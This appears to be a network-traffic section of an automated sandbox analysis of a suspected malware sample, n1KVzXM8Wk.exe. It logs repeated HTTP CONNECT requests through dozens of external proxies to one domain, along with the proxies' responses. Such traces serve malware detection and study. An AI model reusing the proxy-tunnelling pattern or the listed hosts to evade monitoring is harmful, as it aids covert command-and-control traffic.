                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1551192.168.2.45439416.163.88.228806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.283500910 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.616010904 CET668INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.16.1
                                                                                                      Date: Fri, 23 Feb 2024 08:45:28 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 494
                                                                                                      Connection: close
                                                                                                      ETag: "5d52d17f-1ee"
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 33 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 54 61 68 6f 6d 61 2c 20 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 6e 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2e 3c 2f 68 31 3e 0a 3c 70 3e 53 6f 72 72 79 2c 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 69 73 20 63 75 72 72 65 6e 74 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 62 72 2f 3e 0a 50 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 49 66 20 79 6f 75 20 61 72 65 20 74 68 65 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 6f 66 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 20 74 68 65 6e 20 79 6f 75 20 73 68 6f 75 6c 64 20 63 68 65 63 6b 0a 74 68 65 20 65 72 72 6f 72 20 6c 6f 67 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 3c 2f 70 3e 0a 3c 70 3e 3c 65 6d 3e 46 61 69 74 68 66 75 6c 6c 79 20 79 6f 75 72 73 2c 20 6e 67 69 6e 78 2e 3c 2f 65 6d 3e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <!DOCTYPE html><html><head><title>Error</title><style> body { width: 35em; margin: 0 auto; font-family: Tahoma, Verdana, Arial, sans-serif; }</style></head><body><h1>An error occurred.</h1><p>Sorry, the page you are looking for is currently unavailable.<br/>Please try again later.</p><p>If you are the system administrator of this resource then you should checkthe error log for details.</p><p><em>Faithfully yours, nginx.</em></p></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1552192.168.2.454511154.16.63.164436812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.307054043 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1553192.168.2.454431202.148.22.10656786812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.307199955 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1554192.168.2.454339194.233.78.142461156812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.307374001 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.147036076 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:30.377182961 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.844758034 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.740914106 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1555192.168.2.454392203.19.38.11410806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.308505058 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.689565897 CET309INHTTP/1.1 400 Bad Request
                                                                                                      Server: nginx/1.22.0
                                                                                                      Date: Fri, 23 Feb 2024 08:45:28 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 157
                                                                                                      Connection: close
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.22.0</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1556192.168.2.454507104.27.26.29806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.340986013 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.433923006 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:28 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1557192.168.2.453275142.54.235.941456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.363176107 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1558192.168.2.454496195.90.216.7510806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.386991978 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1559192.168.2.454016124.70.78.15780006812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.387397051 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1560192.168.2.4532805.161.98.20432406812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.387607098 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.716461897 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.147113085 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1561192.168.2.45446559.6.26.121806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.395504951 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1562192.168.2.45388272.195.34.5941456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.427267075 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1563192.168.2.451688171.244.10.20487486812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.431689024 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.475142002 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.475486994 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.569158077 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1564192.168.2.454127184.181.217.19441456812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.431840897 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1565192.168.2.451756107.180.90.42171536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.436582088 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.443886995 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.444143057 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1566192.168.2.451809143.110.232.177806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.453574896 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.646990061 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.741189957 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1567192.168.2.453107111.53.178.24973026812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.453881025 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.537657022 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1568192.168.2.454490114.129.2.8280816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.470498085 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.733197927 CET72INHTTP/1.1 200 Connection established
                                                                                                      Proxy-Agent: Fortinet-Proxy/1.0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1569192.168.2.45400792.246.139.113132096812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.478537083 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.475202084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.475486994 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.569156885 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:52.584280014 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:04.584290028 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:16.646804094 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1570192.168.2.453292207.180.198.241425816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.478645086 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1571192.168.2.45450981.228.38.238461156812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.488676071 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1572192.168.2.451861191.37.4.21880856812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.495655060 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.681081057 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.071103096 CET19INHTTP/1.1 200 OK


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1573192.168.2.45450045.177.80.21010806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.540957928 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1574192.168.2.454491210.211.113.36806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.546329021 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1575192.168.2.451849109.205.181.27589816812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.546658039 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1576192.168.2.45410692.204.134.38127526812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.585789919 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1577192.168.2.454529162.159.250.145806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.590471029 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.678641081 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:28 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1578192.168.2.454484116.62.19.21578906812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.594481945 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Feb 23, 2024 09:45:29.365813971 CET113OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Feb 23, 2024 09:45:29.720580101 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1579192.168.2.45451935.185.196.3831286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.599695921 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.768757105 CET39INHTTP/1.1 200 Connection established


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1580192.168.2.454530104.18.254.76806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.609591007 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.696871042 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:28 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1581192.168.2.454085149.28.75.11288886812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.630115032 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.681471109 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:34.682168007 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:40.681066036 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1582192.168.2.4545088.222.145.238156736812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:28.738790989 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


